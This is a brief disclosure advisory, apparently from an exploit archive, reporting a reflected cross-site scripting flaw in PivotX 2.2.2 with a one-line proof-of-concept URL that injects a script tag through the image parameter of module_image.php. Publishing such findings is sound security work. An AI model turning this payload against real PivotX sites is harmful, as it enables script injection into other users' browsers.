PivotX 2.2.2 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................PivotX 2.2.2
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://pivotx.net/
Discovery Date..........1/23/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in PivotX 2.2.2 can be
exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/pivotx/pivotx/modules/module_image.php?image=%3Cscript%3Ealert(0)%3C/script%3E